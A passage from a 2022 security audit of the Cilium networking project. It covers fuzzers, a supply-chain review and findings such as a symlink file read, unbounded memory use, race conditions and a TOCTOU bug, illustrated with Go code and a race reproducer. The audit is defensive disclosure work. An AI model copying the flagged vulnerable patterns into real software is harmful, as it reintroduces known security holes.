escalating to other nodes in the cluster.\nSupply-chain & runtime environment attacks\nCilium acts as a framework to route traffic through the Linux Kernelʼs eBPF runtime in cloud-native\nuse cases. As such, the security of Kubernetes and the Linux Kernel affects Cilium users in several\nways. From one side, vulnerabilities in either Kubernetes or the Linux Kernelʼs eBPF\nimplementation may bring Cilium users at risk despite the root cause not stemming from Cilium\nitself. From another side, Cilium may not interact with these 3rd-party ecosystems - like Kubernetes\nthe eBPF datapath - correctly which could lead to security issues.\nBesides large ecosystems like Kubernetes and the Linux kernel, Cilium also depends on 3rd-party\nlibraries for specific functionality in Cilium. A malicious attacker may find vulnerabilities in or\nintentionally commit vulnerable code to a 3rd-party dependency of Cilium. This could have an\neffect on Ciliums security posture. The attack surface through 3rd-party dependencies varies based\non the extent to which the dependencies are used. For example, the library\ngithub.com/vishvananda/netlink\nis widely used across\nthe entire cilium repository, whereas others\nare only used in tests.\n10\nCilium security audit, 2022\nAs an example, Cilium has previously been affected by vulnerabilities in Envoy which Cilium uses to\nenforce certain L7 policies. These are described in detail here:\n●\nhttps://github.com/cilium/cilium/security/advisories/GHSA-6hf9-972x-wff3\n●\nhttps://github.com/cilium/cilium/security/advisories/GHSA-9hx8-3wfx-q2vw\nWe highlight here that the SLSA review given below outlines several of the practices that Cilium\ndeploys to protect against supply chain security attacks.\nComplex code assumptions regarding trusted input\nThroughout the audit we found several pieces of code that alone did not constitute a security\nvulnerability. However, the code had certain properties where minor changes in the code base\ncould result in security vulnerabilities without necessarily being obvious. Issue 4 and 5 are\nexamples of this, where unbounded memory allocation happens. At the given moment we did not\nfind these issues to be vulnerable, however, it is code that may be re-used improperly at a later\nstage can introduce a potential issue, where it may not be obvious that it is improperly re-used.\nIn essence, we consider this as an instance of complex code where assumptions of input to\nfunctions are not obvious. Consequently, it is not obvious from the code that it is indeed safe,\nwhere it could be made more obvious. A complex code base has security implications on the\nproject - albeit indirectly. Complex code conceals vulnerabilities which in turn makes them arduous\nto identify in merged code and during code reviews before the code is even merged. In addition,\ncomplex code increases the overhead of contributing to the project which in turn might lead to\nfewer security issues being uncovered by the community.\n11Cilium security audit, 2022\nFuzzing\nHaving high fuzz test coverage is an important element of the security measures of a project. At the\ncommencement of this audit, Cilium had carried out extensive work to integrate fuzzing in a\nprevious fuzzing audit also performed by Ada Logics. In this security audit, Ada Logics did an\nassessment of where the project could improve its fuzzing. The high-level tasks that we carried out\nwere:\nImprove test coverage of Cilium\nAda Logics wrote 10 fuzzers targeting policy handling as well as use of critical dependencies.\nAdd fuzzing to critical 3rd-party library\nAda Logics made an initial integration on OSS-Fuzz for the extensively usedgithub.com/vishvananda/netlink\ndependency. In addition\nwe wrote 3 fuzzers for APIs used\nby Cilium.github.com/vishvananda/netlink\nhas not\nbeen integrated into OSS-Fuzz at this\ntime due to lack of upstream response.\nCilium Fuzzers written during the audit\n#\nName\nPackage\n1FuzzCiliumNetworkPolicyParsepkg/k8s/apis/cilium.io/v2\n2FuzzCiliumClusterwideNetworkPolicyParsepkg/k8s/apis/cilium.io/v2\n3FuzzTestpkg/policy\n4FuzzRegenerateGatewayConfigspkg/egressgateway\n5FuzzParseCEGPpkg/egressgateway\n6FuzzGetLookupTablepkg/maglev\n7FuzzRoutespkg/testutils\n8FuzzListRulespkg/testutils\n9FuzzMapSelectorsToIPsLockedpkg/fqdn\n10FuzzNodeHandlerpkg/datapath/linux\nFuzzer descriptions\nFuzzCiliumNetworkPolicyParse\nParses a pseudo-randomized CiliumNetworkPolicy.\nFuzzCiliumClusterwideNetworkPolicyParse\n12Cilium security audit, 2022\nParses a pseudo-randomized CiliumClusterwideNetworkPolicy.\nFuzzTest\nCreates a pseudo-randomized api rule and calls its resolveEgressPolicy method.\nFuzzRegenerateGatewayConfigs\nCreates a Manager with pseudo-random nodes and policy configs and invokes the managers\nregenerateGatewayConfigs() method.\nFuzzParseCEGP\nParses a pseudo-randomized CiliumEgressGatewayPolicy.\nFuzzGetLookupTable\nPasses a pseudo-randomized map of backends to GetLookupTable().\nFuzzRoutes\nPasses a pseudo-randomized Route to multiple APIs in pkg/datapath/linux/route.\nFuzzListRules\nPasses a pseudo-randomized Rule to ListRules().\nFuzzMapSelectorsToIPsLocked\nPasses a pseudo-randomized map of FQDNSelectors to MapSelectorsToIPsLocked().\nFuzzNodeHandler\nCreates a linux node handler and a Node and passes the node to multiple methods of the linux\nnode handler.\nNetlink Fuzzers written during the audit\n#\nName\nPackage\n1FuzzLinkByNamenetlink\n2FuzzDeserializeRoutepkg/k8s/apis/cilium.io/v2\n3FuzzParseRawDatapkg/policy\nFuzzLinkByName\nPasses a pseudo-random string toLinkByName()\nwhich\nreturns aLink\n. Passes thatLink\ntoAddrList()\n.\nFuzzDeserializeRoute\nPasses raw data todeserializeRoute()\n.\n13Cilium security audit, 2022\nFuzzParseRawData\nPasses raw data toparseRawData()\n.\n14Cilium security audit, 2022\nSupply chain\nScorecard\nAt the time of this audit, Cilium has not integrated the Scorecard project.\nScorecard is an open source tool that helps projects assess security risks in their code base. It\nperforms a series of checks and scores the overall security posture on a scale from 1-10. If the\nproject scores low, Scorecard will provide recommendations for remediation and mitigation.\nCilium can use Scorecard for its own repository to increase transparency on the overall security\nposture of the project. This will help demonstrate what Cilium is doing right, and it will make it\nclear to the community which actionable issues require contributions. Integrating Scorecard into\nCilium would add the OpenSSF Scorecard badge to the README, where Cilium also has the\n“OpenSSF best practices” badge.\nThe Cilium community could consider requiring 3rd-party dependencies to integrate with\nScorecard to increase transparency of Ciliumʼs own supply chain. We recommend discussing this in\na public Github issue. In case this is something the community would like enforced, it too could be\na shared effort to bring Scorecard to Ciliums own supply chain.\nMore information on Scorecard can be found below:\n●\nhttps://securityscorecards.dev\n●\nhttps://github.com/ossf/scorecard\nSLSA review\nSLSA is a framework designed to mitigate threats against the so\u0000ware supply chain. Its\npurpose is to ensure integrity and prevent tampering of so\u0000ware artifacts. SLSA aims to\nensure the integrity of the source, the build and the availability of so\u0000ware artifacts\ntodefend against a series of known attack vectors of the so\u0000ware supply-chain\n2\n.\nOverall, Cilium is not yet SLSA 1 compliant, but with a few improvements can reach level 3.\nAda Logics follows the specification of SLSA v0.1 that is outlined here:\nhttps://slsa.dev/spec/v0.1/requirements\n. This version\nof the compliance requirements is\ncurrently in alpha and is likely to change.\nGiven the early stages of SLSA, projects looking to comply should consider compliance to\nbe an on-going process with regular assessment on whether all requirements are satisfied.\nEven when SLSA levels are met, Cilium should work actively on maintaining the achieved\n2\nhttps://slsa.dev/spec/v0.1/threats\n15Cilium security audit, 2022\nlevels, and we recommend that future security audits include an assessment on how\nCilium performs in maintaining the achieved SLSA compliance level. In this audit, several\nof the requirements were assessed by Cilium maintainers, and as a consequence of this\nintrospective work, we - Ada Logics - consider the Cilium project to be self-sustaining in\nprogressing with compliance. A Github issue has been created here for that purpose:\nhttps://github.com/cilium/cilium/issues/22740\n.\nCilium performs well in the Source and Build categories and meets most requirements in\nthese categories up to and including level 3.\nThe “Two-person viewed” criteria under “Source” is fulfilled, since two Cilium maintainers\nare involved in merging pull requests. Not all pull requests are explicitly approved by the\nsecond maintainer, and we recommend that the second maintainer involved in a\npull-request review approves it before merging to avoid doubt of fulfilling this\nrequirement.\nThe primary missing domain for SLSA compliance is the provenance which is not\ngenerated during releases. The\nhttps://github.com/slsa-framework/slsa-github-generator\nproject offers a series of tools to generate SLSA level 3-compliant provenance attestation\nfor Github-hosted projects. These tools are created to specifically satisfy the\nprovenance-section of the three SLSA categories and will be a useful addition to Ciliums\nSLSA compliance. When Cilium makes the provenance available, it has achieved SLSA level\n1 compliance.\nSLSA compliance overview\nRequirement\nSLSA 1\nSLSA 2\nSLSA 3\nSLSA 4\nSource\n- Version controlled\n✓\n✓\n✓\nSource\n- Verified history\n✓\n✓\nSource\n- Retained indefinitely\n✓ (\n18 \nmo.)\n✓\nSource\n- Two-person reviewed\n✓\nBuild\n- Scripted build\n✓\n✓\n✓\n✓\nBuild\n- Build service\n✓\n✓\n✓\nBuild\n- Build as code\n✓\n✓\nBuild\n- Ephemeral environment\n✓\n✓\n16Cilium security audit, 2022\nBuild\n- Isolated\n✓\n✓\nBuild\n- Parameterless\n✓\nBuild\n- Hermetic\n⛔\nBuild\n- Reproducible\n⛔\nProvenance\n- Available\n⛔\n⛔\n⛔\n⛔\nProvenance\n- Authenticated\n⛔\n⛔\n⛔\nProvenance\n- Service generated\n⛔\n⛔\n⛔\nProvenance\n- Non-falsifiable\n⛔\n⛔\nProvenance\n- Dependencies complete\n⛔\nCommon\n- Security\nNot defined by SLSA requirements\nCommon\n- Access\n✓\nCommon\n- Superusers\n✓\n17Cilium security audit, 2022\nIssues\nThis section presents issues found during the audit. Find an up-to-date report on the status\nof these issues at https://github.com/cilium/cilium/issues/23121\n#\nTitle\nSeverity\n1\nOut of bounds file read in certificate manager\nGetSecrets()\nLow\n2\nMissing central documentation on using Cilium securely\nMedium\n3\nHandlers of the Cilium Docker plugin do not limit the size of the http request\nbody before decoding it.\nInformational\n4\nPossible memory exhaustion from CNI template rendering\nInformational\n5\nPossible excessive memory allocation\nLow\n6\nRace condition in Hubble Relay Peer Manager\nLow\n7\nRace condition in\npkg/policy.Repository.LocalEndpointIdentityRemoved()\nLow\n8\nDeprecated 3rd-party library\nInformational\n9\nTOCTOU race condition in endpoint file move helper function\nLow\n10\nRedundant return statements\nInformational\n11\nRedundant imports\nInformational\n12\nRedundant function parameters\nInformational\n13\nTOCTOU race condition in sockops\nbp\u0000oolLoad\nLow\n14\nLevel of trust for input from cloud providers is too high\nLow\n15\nBGP configuration file is read entirely into memory\nLow\n16\nRace condition when starting operator apiserver\nLow\n17\nBad code practice: Identical identifier of import and variable\nLow\n18\nDeadlock from locked mutex\nMedium\n19\nPossible type confusions\nLow\n20\nIll-defined contexts\nInformational\n21\nUse of deprecated TLS version\nInformational\n22\nDeprecated function calls\nLow\n18Cilium security audit, 2022\n1: Out of bounds file read in certificate managerGetSecrets()\nOverall severity:\nLow\nID:\nADA-CIL-1\nLocation:\nhttps://github.com/cilium/cilium/blob/e4af2f9a0c28c84090c7142e241 \nc2749a3f84ed9/pkg/crypto/certificatemanager/certificate_manager.go \n#L42\nCWE:\n●\nCWE-125: Out-of-bounds Read\nDescription\nAn attacker that can create a symlink in thecertPath\nof a given namespace can potentially read\nfiles outside of thecertPath\n.\nhttps://github.com/cilium/cilium/blob/314ca7baef f4f568f fc0bad95124e40665b1f88c/pkg/crypto/certificatemanager/ \ncertificate_manager .go#L42\nfunc(m *Manager)GetSecrets(ctx context.Context,secret *api.Secret, nsstring) (string,map[string][]byte, error) {...nsName := filepath.Join(ns, secret.Name)...certPath := filepath.Join(m.rootPath, nsName)files, ioErr := os.ReadDir(certPath)ifioErr ==nil{secrets :=make(map[string][]byte,len(files))for_, file :=rangefiles {varbytes []byte\npath := filepath.Join(certPath, file.Name())bytes, ioErr = os.ReadFile(path)ifioErr ==nil{secrets[file.Name()] = bytes}}\niflen(secrets) ==0&& ioErr !=nil{returnnsName,nil, ioErr}returnnsName, secrets,nil}secrets, err := m.k8sClient.GetSecrets(ctx, ns, secret.Name)returnnsName, secrets, err}\nThe root cause of the issue is thatos.ReadFile()\nresolves symlinks. For example, an attacker\ncould create a symlink in certPath with the filename “tls.key” linking to a cert file elsewhere on the\nmachine. m.GetSecrets would then first read all the files in certPath:\nfiles, ioErr := os.ReadDir(certPath)\n19Cilium security audit, 2022\nCilium then proceeds to read filenames. Here,path\nwould be correct, but Cilium would resolve a\nsymlink. bytes could be the file contents of the file being linked to in a symlink.\npath := filepath.Join(certPath, file.Name())bytes, ioErr = os.ReadFile(path)\nThe file contents are stored by filename:\nsecrets[file.Name()] = bytes\nNote that there is also a TOCTOU race condition in this part of the code.GetSecrets()\nonly uses\nthe file names in the directory and subsequently reads the files on their path, the files could\ntheoretically be changed in the time between the invocation ofos.ReadDir()\nandos.ReadFile()\n.\nThe ʻcertPathʼ is considered a privileged directory created by the privileged user. Thus, there is no\nescalation of privileges since the privileged user will also have access to the linked files in a\nsymlink.”\n20Cilium security audit, 2022\n2: Missing central documentation on using Cilium securely\nOverall severity:\nMedium\nID:\nADA-CIL-2\nLocation:\nDocumentation\nFix:\nhttps://github.com/cilium/cilium/pull/23599\nDescription\nMisconfiguration is a major security problem with misconfiguration currently ranking 5 on OWASPʼs\ntop ten (2021). In cloud environments data indicates misconfiguration is the most significant\nreason for unnecessary security risk exposure\n3\n. Cilium\nusers should be able to confidently follow\nindustry standards in their deployments, and the documentation should provide this information.\nCilium should also list whether there are limitations of the default setting from a security\nperspective.\nCilium's documentation is extensive and provides information on both internals, the fundamentals\nof eBPF as well as usage and getting started. The documentation also includes walk-throughs of\nusing various common components that might be used in an application deployment alongside\nCilium:\n●\nHow to secure gRPC:\nhttps://docs.cilium.io/en/v1.12/gettingstarted/grpc/\n●\nGetting Started Securing Elasticsearch:\nhttps://docs.cilium.io/en/v1.12/gettingstarted/elasticsearch/\n●\nHow to Secure a Cassandra Database:\nhttps://docs.cilium.io/en/v1.12/gettingstarted/cassandra/\n●\nGetting Started Securing Memcached:\nhttps://docs.cilium.io/en/v1.12/gettingstarted/memcached/\nThese are great tutorials to include in the documentation, however, users are required to read\nthrough the entire documentation to extract all security-relevant information on configuration.\nThis is a time-consuming task, magnified by some tutorials being in a step-by-step format requiring\nsetting up a test environment. The consequences of this may be that some CIlium users postpone\nextracting all documentation relevant to securely configuring Cilium, or that some users go\nthrough the documentation but fail to absorb all security-relevant information because it is\nscattered across the entire documentation.\nWe recommend creating a single-page piece of documentation that in short-form covers all known\nconfiguration points that could put users at risk if misconfigured. This will ensure that adopters can\nquickly and confidently go through all best-practice configurations and ensure they follow the\nrecommended standards.\nFor examples of security best practice documentation, see:\n3\nhttps://www.armosec.io/blog/what-we-learned-from-scanning-over-10k-kubernetes-clusters/\n21Cilium security audit, 2022\n●\nhttps://istio.io/latest/docs/ops/best-practices/security/\n●\nhttps://github.com/kubeedge/community/blob/master/sig-security/sig-security-audit/Kub\neEdge-threat-model-and-security-protection-analysis.md\n22Cilium security audit, 2022\n3. Handlers of the Cilium Docker plugin do not limit the size of\nthe http request body before decoding it\nOverall severity:\nLow\nID:\nADA-CIL-3\nLocation:\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed1954641\n34e9586/plugins/cilium-docker/driver/driver.go\nCWE:\n●\nCWE-400: Uncontrolled Resource Consumption\nDescription\nThe Cilium Docker plugin does not check the size of the request body before decoding it. An http\nrequest with a large body could cause temporary DoS of the machine. Local testing demonstrated a\ndenial of the machine of ~ 10 seconds before Go terminated.\nThe issue exists here:\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed195464134e9586/plugins/cilium-docke\nr/driver/driver.go#L327\nfunc(driver *driver)createNetwork(w http.ResponseWriter,r *http.Request) {varcreate api.CreateNetworkRequesterr := json.NewDecoder(r.Body).Decode(&create)iferr !=nil{sendError(w,\"Unable to decode JSON payload: \"+err.Error(),http.StatusBadRequest)return}log.WithField(logfields.Request, logfields.Repr(&create)).Debug(\"NetworkCreate Called\")emptyResponse(w)}\nAs well as these places:\n●\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed195464134e9586/plugins/ciliu\nm-docker/driver/driver.go#L340\n●\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed195464134e9586/plugins/ciliu\nm-docker/driver/driver.go#L360\n●\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed195464134e9586/plugins/ciliu\nm-docker/driver/driver.go#L436\n●\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed195464134e9586/plugins/ciliu\nm-docker/driver/driver.go#L456\n●\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed195464134e9586/plugins/ciliu\nm-docker/driver/driver.go#L474\n●\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed195464134e9586/plugins/ciliu\nm-docker/driver/driver.go#L513\n23Cilium security audit, 2022\n●\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed195464134e9586/plugins/ciliu\nm-docker/driver/ipam.go#L68\n●\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed195464134e9586/plugins/ciliu\nm-docker/driver/ipam.go#L81\n●\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed195464134e9586/plugins/ciliu\nm-docker/driver/ipam.go#L93\n●\nhttps://github.com/cilium/cilium/blob/a5901e562faae14b86fc02d6ed195464134e9586/plugins/ciliu\nm-docker/driver/ipam.go#L142\nThis binary is not distributed or installed in Cilium environments. It's used for development\npurposes in some of the older testing infrastructure and we've been discussing getting rid of it.\n24Cilium security audit, 2022\n4. Possible memory exhaustion from CNI template rendering\nOverall severity:\nInformational\nID:\nADA-CIL-4\nLocation:\nhttps://github.com/cilium/cilium/blob/12b7b11e10c87dce2704d4252d22ff202a48ebc1\n/daemon/cmd/cni.go#L271\nCWE:\n●\nCWE-400: Uncontrolled Resource Consumption\nDescription\nCiliums CNI injection mechanism contains several memory allocations with no upper bounds that\nmay end in a memory exhaustion vulnerability. We did not find a way for this to be vulnerable at\nthe moment, however, we highlight this as a possible issue in that it may be exposed in the future.\nThe root cause of the issue is that Cilium merges two byte slices without enforcing an upper limit\non either. There are several places where this could fail, and we list these further below. First we\npresent the dataflow of the CNI injection. The two byte slices being merged are:\n1.\nA CNI template containing an aws CNI entry. This is the entry that gets added to the CNI\nconfiguration file.\n2.\nThe contents of the CNI configuration file.\nThe merging happens inrenderCNIConf()\n:\nfuncrenderCNIConf(opts *option.DaemonConfig, confDirstring) (cniConfig []byte, errerror) {\nifopts.CNIChainingMode ==\"aws-cni\"{pluginConfig := renderCNITemplate(awsCNIEntry, opts)cniConfig, err = mergeExistingAWSCNIConfig(confDir, pluginConfig)iferr !=nil{returnnil, err}}else{...}\n...returncniConfig,nil}\nrenderCNIConf\ncreates the bytes that will later be\nadded to the existing CNI configuration\nfile. This happens inrenderCNITemplate\n:\nfuncrenderCNITemplate(instring, opts *option.DaemonConfig)[]byte{data :=struct{DebugboolLogFilestring\n25Cilium security audit, 2022\n}{Debug: opts.Debug,LogFile: opts.CNILogFile,}\nt := template.Must(template.New(\"cni\").Parse(in))\nout := bytes.Buffer{}iferr := t.Execute(&out, data); err !=nil{panic(err)// impossible}returnout.Bytes()}\nrenderCNITemplate\nadds the values of theDebug\nandCNILogFile\nfields from theDaemonConfig\nto theawsCNIEntry\ntemplate:\nconstawsCNIEntry =`{\"type\": \"cilium-cni\",\"enable-debug\": {{.Debug | js }},\"log-file\": \"{{.LogFile | js }}\"}`\nThis template is then passed tomergeExistingAWSCNFConfig\nwhich reads the existing cni\nconfig file and adds the Cilium plugin:\nfuncmergeExistingAWSCNIConfig(confDirstring, pluginConfig[]byte) ([]byte, error) {awsFiles := []string{\"10-aws.conflist\",\"10-aws.conflist.cilium_bak\"}found, err := findFile(confDir, awsFiles)iferr !=nil{returnnil, fmt.Errorf(\"could not find existingAWS CNI config forchaining %w\", err)}\ncontents, err := os.ReadFile(found)iferr !=nil{returnnil, fmt.Errorf(\"failed to read existingAWS CNI config %s: %w\",found, err)}\n// We found the CNI configuration,// inject Cilium as the last chained pluginout, err := sjson.SetRawBytes(contents,\"plugins.-1\",pluginConfig)iferr !=nil{returnnil, fmt.Errorf(\"failed to modify existingAWS CNI config at %s:%w\", found, err)}log.Infof(\"Inserting cilium in to CNI configurationfile at %s\", found)returnout,nil}\n26Cilium security audit, 2022\nFinally the merged aws plugin and the existing file contents are written back to the CNI config file.\nSince there are no upper bounds on the size of the template or the size of the existing CNI\nconfiguration file, Cilium may try to allocate excessive memory in the CNI merging workflow. At the\nmoment, we have found 2 ways to manipulate the amount of allocated memory:\n1.\nCreate a DaemonConfig with a largeCNILogFile\nstring.\nThis will create a large template.\nThe failure can happen at the moment the template is created in case its size is enough to\nexhaust memory, or later in the CNI merging process.\n2.\nThe existing CNI configuration file is large. Once its contents are merged with the template,\nthis may exhaust memory.\nRecommendation\nWe acknowledge that this code does not constitute a bug at the moment. However, we recommend\neither leaving a comment in the code that highlights the unbounded memory allocations are in fact\nsafe, or, add upper bounds to the template size and the existing CNI configuration file before\nreading it.\n27Cilium security audit, 2022\n5: Possible excessive memory allocation\nOverall severity:\nInformational\nID:\nADA-CIL-5\nLocation:\nhttps://github.com/cilium/cilium/blob/dac4c0691c2fd611308b28ed08 \nb8ba2ee7f38b8c/pkg/labels/labels.go#L478\nCWE:\n●\nCWE-400: Uncontrolled Resource Consumption\nDescription\nCilium may be made to create a byte slice that exceeds the memory available on the machine inlabels.SortedList()\n:\nfunc(l Labels)SortedList() []byte{keys :=make([]string,0,len(l))fork :=rangel {keys =append(keys, k)}sort.Strings(keys)\nb := make([]byte, 0, len(keys)*2)buf := bytes.NewBuffer(b)for_, k :=rangekeys {buf.Write(l[k].FormatForKVStore())}\nreturnbuf.Bytes()}\nIn similar fashion to issue 4, we did not find this to be vulnerable at this given moment, but we\nhighlight it as a potential issue since unbounded memory allocations can lead to memory\nexhaustion. It is worth noting here that according to\nhttps://kubernetes.io/docs/concepts/overview/working-with-objects/labels/#syntax-and-character\n-set\nlabels are constrained in size, label keys <\n63 characters, but with a < 253 char potential prefix,\nvalues < 63 characters. Generously: below 400 ASCII characters, hence <400 bytes per label.\n28Cilium security audit, 2022\n6: Race condition in Hubble Relay Peer Manager\nOverall severity:\nLow\nID:\nADA-CIL-6\nLocation:\nhttps://github.com/cilium/cilium/blob/82c742f2e9fb65fb3fc392c7dcb3b4e22\nb69c650/pkg/hubble/relay/pool/manager.go#L143-L186\nCWE:\n●\nCWE-362: Concurrent Execution using Shared Resource with \nImproper Synchronization ('Race Condition')\nFix:\nhttps://github.com/cilium/cilium/commit/43121d9d554604f708eb273d117b6 \n8960747812d\nDescriptionPeerManager.manageConnections()\ncreates a goroutine\ninside a loop and references a\nvariable outside the goroutine. This can result in a race condition, whereby both the PeerManager\nand the peer name might change between they are declared and the time they are used inside the\ngoroutine:\nhttps://github.com/cilium/cilium/blob/82c742f2e9fb65fb3fc392c7dcb3b4e22b69c650/pkg/hubble/relay/poo\nl/manager.go#L143-L186\nfunc(m *PeerManager)manageConnections() {connTimer, connTimerDone := inctimer.New()deferconnTimerDone()for{select{case<-m.stop:returncasename := <-m.offline:m.mu.RLock()p := m.peers[name]m.mu.RUnlock()m.wg.Add(1)gofunc() {deferm.wg.Done()// a connection request has been made, make sureto attempta connectionm.connect(p, true)}()case<-connTimer.After(m.opts.connCheckInterval):m.mu.RLock()now := time.Now()for_, p :=rangem.peers {p.mu.Lock()ifp.conn !=nil{switchp.conn.GetState() {caseconnectivity.Connecting, connectivity.Idle,connectivity.Ready, connectivity.Shutdown:p.mu.Unlock()continue}\n29Cilium security audit, 2022\n}switch{casep.nextConnAttempt.IsZero(),p.nextConnAttempt.Before(now):p.mu.Unlock()m.wg.Add(1)gofunc() {deferm.wg.Done()m.connect(p, false)}()default:p.mu.Unlock()}}m.mu.RUnlock()}}}\nMinimal reproducer\nThe race condition is demonstrated with this reproducer that mimics the behaviour ofmanageConnections()\n.\nTowards the end of the program,\na line with a panic is marked with\nyellow. This panic will only be triggered iffirstPeerName\nandsecondPeerName\nare different, ie.\nif the\np\nchanges before it is used inside the goroutine.\npackagemain\nimport(\"fmt\"\"github.com/cilium/cilium/pkg/lock\"\"sync\")\ntypepeerstruct{mu lock.Mutexnamestring}\ntypemstruct{mu lock.RWMutexwg sync.WaitGrouppeersmap[string]*peer}\nfunc(m *m)connect(p *peer) {fmt.Println(p.name)}\nfuncmain() {peers :=map[string]*peer{\"peer1\": &peer{name:\"peer1\"},\"peer2\": &peer{name:\"peer2\"},\"peer3\": &peer{name:\"peer3\"},\n30Cilium security audit, 2022\n\"peer4\": &peer{name:\"peer4\"},\"peer5\": &peer{name:\"peer5\"},\"peer6\": &peer{name:\"peer6\"},\"peer7\": &peer{name:\"peer7\"},\"peer8\": &peer{name:\"peer8\"},\"peer9\": &peer{name:\"peer9\"},\"peer510\": &peer{name:\"peer10\"},}m := &m{peers: peers}m.mu.RLock()for_, p :=rangem.peers {p.mu.Lock()p.mu.Unlock()m.wg.Add(1)gofunc() {deferm.wg.Done()firstPeerName := fmt.Sprintf(\"%s\", p.name)secondPeerName := fmt.Sprintf(\"%s\", p.name)ifsecondPeerName != firstPeerName {panic(fmt.Sprintf(\"We won the race:\\n'p.name'is %s and'firstPeerName' is %s\\n\", p.name, firstPeerName))}m.connect(p)}()fmt.Println(\"End of loop\")}m.mu.RUnlock()}\nFor more info, see\nEffective Go: goroutines\n.\n31Cilium security audit, 2022\n7: Race condition inpkg/policy.Repository.LocalEndpointIdentityRemoved()\nOverall severity:\nLow\nID:\nADA-CIL-7\nLocation:\n●\nhttps://github.com/cilium/cilium/blob/bbcadc43758b7e3c89d0ef9a3\n9266fff1bc41849/pkg/policy/repository.go#L404\n●\nhttps://github.com/cilium/cilium/blob/314ca7baeff4f568ffc0bad9512\n4e40665b1f88c/pkg/identity/identitymanager/manager.go#L150\nCWE:\n●\nCWE-362: Concurrent Execution using Shared Resource with \nImproper Synchronization ('Race Condition')\nDescription\nAnother case of creating a goroutine and using a variable inside the goroutine that was declared\noutside of the goroutine exists inpkg/policy.Repository.LocalEndpointIdentityRemoved()\n.\n(*Repository).LocalEndpointIdentityRemoved()\ncreates\na goroutine:\nfunc(p *Repository)LocalEndpointIdentityRemoved(identity*identity.Identity) {gofunc() {scopedLog := log.WithField(logfields.Identity, identity)scopedLog.Debug(\"Removing identity references frompolicy cache\")p.Mutex.RLock()wg := p.removeIdentityFromRuleCaches(identity)wg.Wait()p.Mutex.RUnlock()scopedLog.Debug(\"Finished cleaning policy cache\")}()}\nLocalEndpointIdentityRemoved()\nis called here:\nhttps://github.com/cilium/cilium/blob/master/pkg/identity/identitymanager/manager.go\nfunc(idm *IdentityManager)remove(identity *identity.Identity){\nifidentity ==nil{return}\nidMeta, exists := idm.identities[identity.ID]if!exists {log.WithFields(logrus.Fields{logfields.Identity: identity,}).Error(\"removing identity not added to the identitymanager!\")\n32Cilium security audit, 2022\nreturn}idMeta.refCount--ifidMeta.refCount ==0{delete(idm.identities, identity.ID)foro :=rangeidm.observers {o.LocalEndpointIdentityRemoved(identity)}}\n}\nThe for-loop (marked with blue) loops through all observers of the identitymanager, and starts a\ngoroutine in each iteration. This will not always start one goroutine for each observer but might\nstart multiple goroutines for the same observer.\nFor more info, see\nEffective Go: goroutines\n.\n33Cilium security audit, 2022\n8: Deprecated 3rd-party library\nOverall severity:\nInformational\nID:\nADA-CIL-8\nLocation:\n●\nhttps://github.com/cilium/cilium/blob/3f6dadc91c92bdf09a5dfaedb\n93047dc9f764cc3/tools/tools.go#L11\nCWE:\n●\nCWE-477: Use of Obsolete Function\nDescription:\nCilium has in its dependency treegithub.com/gogo/protobuf\nwhich is deprecated. We\nrecommend discontinuing all use of deprecated dependencies.\nKubernetes also relies on this library:\nhttps://github.com/kubernetes/kubernetes/issues/96564\n,\nand since Cilium uses kubernetes libraries, Cilium cannot remove this dependency until k8s does it.\n34Cilium security audit, 2022\n9: TOCTOU race condition in endpoint file move helper function\nOverall severity:\nLow\nID:\nADA-CIL-9\nLocation:\n●\nhttps://github.com/cilium/cilium/blob/314ca7baeff4f568ffc0bad9512\n4e40665b1f88c/pkg/endpoint/directory.go#L50\nCWE:\n●\nCWE-367: Time-of-check Time-of-use (TOCTOU) Race Condition\nDescription\nA TOCTOU race condition exists in pkg/endpoint when moving files from one directory to another.\nhttps://github.com/cilium/cilium/blob/314ca7baeff4f568ffc0bad95124e40665b1f88c/pkg/endpoint\n/directory.go#L50\nfuncmoveNewFilesTo(oldDir, newDirstring)error{oldFiles, err := os.ReadDir(oldDir)iferr !=nil{returnerr}newFiles, err := os.ReadDir(newDir)iferr !=nil{returnerr}\nfor_, oldFile :=rangeoldFiles {exists :=falsefor_, newFile :=rangenewFiles {ifoldFile.Name() == newFile.Name() {exists =truebreak}}if!exists {os.Rename(filepath.Join(oldDir,oldFile.Name()),filepath.Join(newDir,oldFile.Name()))}}returnnil}\nThis could be exploited if an attacker can replace a file in oldDir a\u0000er oldDir has been read and\nbefore the file is renamed.\nThe issue could potentially allow users to create files in directories that they should not be able to\ncreate files in.\nThis issue is ratedLOW\n, because an attacker with\nthis level of access can trigger the impact\nregardless of the TOCTOU race condition.\n35Cilium security audit, 2022\nTo replace a file in oldDir, the adversary already needs unix permissions to create/delete files in\nthat directory. If that is given, they can just create a file in oldDir, which will then be moved to\nnewDir if there is no file name conflict.”\n36Cilium security audit, 2022\n10: Redundant return statements\nOverall severity:\nInformational\nID:\nADA-CIL-10\nLocation:\nSeveral packages\nCWE:\n●\nCWE-1041: Use of Redundant Code\nDescription\nhttps://github.com/cilium/cilium/blob/314ca7baeff4f568ffc0bad95124e40665b1f88c/cilium/cmd/debuginfo.go#L346\nfuncwriteJSONPathToOutput(buf bytes.Buffer, pathstring, suffixstring, jsonPathstring){data := buf.Bytes()db := &models.DebugInfo{}err := db.UnmarshalBinary(data)iferr !=nil{fmt.Fprintf(os.Stderr,\"error unmarshaling binary:%s\\n\", err)}jsonStr, err := command.DumpJSONToString(db, jsonPath)iferr !=nil{fmt.Fprintf(os.Stderr,\"error printing JSON: %s\\n\",err)}\nifpath ==\"\"{fmt.Println(jsonStr)return}\nfileName := fileName(path, suffix)writeFile([]byte(jsonStr), fileName)\nfmt.Printf(\"%s output at %s\\n\", jsonpathOutput, fileName)return}\nhttps://github.com/cilium/cilium/blob/00e40bb41683b9b3462a94879a93841751197629/daemon/cmd/config.go#L33\nfunc(h *patchConfig)configModify(params 